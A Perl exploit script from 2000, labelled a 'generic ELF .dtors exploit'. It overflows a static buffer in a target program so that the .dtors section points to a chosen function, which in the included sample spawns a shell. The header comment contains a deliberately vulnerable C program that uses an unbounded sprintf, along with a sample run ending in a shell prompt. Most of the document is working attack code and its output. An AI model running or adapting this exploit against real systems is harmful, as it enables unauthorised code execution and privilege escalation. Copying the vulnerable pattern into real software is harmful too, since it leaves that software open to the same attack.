#!/usr/bin/perl
#
# Generic ELF .dtors exploit.
# 
# Authors: loophole && icesk of hhp via ttysnoop, HEH.
# Date: 12/22/2000.
# www.hhp-programming.net
#
# ------------- Example exploitable program. ---------------------
#
#  /* dtors.c */
#  #include <stdio.h>
#  #include <sys/types.h>
#  int main(int argc,char **v){
#   static u_char buffer[]="doot";
#   sprintf(buffer,"%s",v[1]);
#  }
# 
#  getit(void){
#   printf("%0x overwrote .dtors!\n",&getit);
#   execl("/bin/sh","sh",0);
#  }
#
#-----------------------------------------------------------------
#
# Example exploit execution:
#  dipped:~/dtors$ ./hhp-dtors.pl dtors getit 24
#  Exploiting .dtors address: 08048478...
#  8048478 overwrote .dtors!
#  sh-2.03$
#
#-----------------------------------------------------------------


($prog, $func, $size) = @ARGV or die "$0 <program> <function()> <bufsize>";
if($prog=~/[^a-zA-Z0-9\-_]/o){&die;}
if($func=~/[^a-zA-Z0-9\-_]/o){&die;}
if($size=~/[^0-9]/o){&die;}
$addr = `/usr/bin/objdump --syms $prog|/usr/bin/grep $func|/usr/bin/awk '{print
 \$1}'`;
chomp($addr);

print "Exploiting .dtors address: $addr...\n";

if($addr=~/(..)(..)(..)(..)/){
$a=$4;$b=$3;$c=$2;$d=$1;
}

$FINIBUF = ("A"x$size) . "\\x$a\\x$b\\x$c\\x$d";
print system "/usr/bin/perl -e 'system \"./$prog $FINIBUF\"'";
sub die(){print "Incorrect characters, possible security breach... Nice Try!\n"
;exit(0);}
#eof